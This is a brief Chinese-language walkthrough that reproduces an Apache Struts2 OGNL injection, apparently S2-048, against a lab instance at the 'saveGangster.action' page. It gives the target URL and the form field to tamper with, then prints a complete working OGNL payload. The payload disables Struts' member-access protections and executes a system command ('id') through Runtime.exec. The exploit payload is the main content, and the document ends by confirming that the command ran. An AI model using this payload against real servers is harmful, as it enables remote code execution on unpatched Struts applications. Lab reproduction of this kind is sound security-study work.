搭建
访问成功
复现
. 在浏览器输入以下链接访问漏洞页面
http://your-ip:8080/integration/saveGangster.action
在表单中填入如上,主要第一个表单其他可以随便乱写,点解submit
在Gangster Name”处把${1+1}修改为以下命令执行的payload语句
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}
命令成功执行了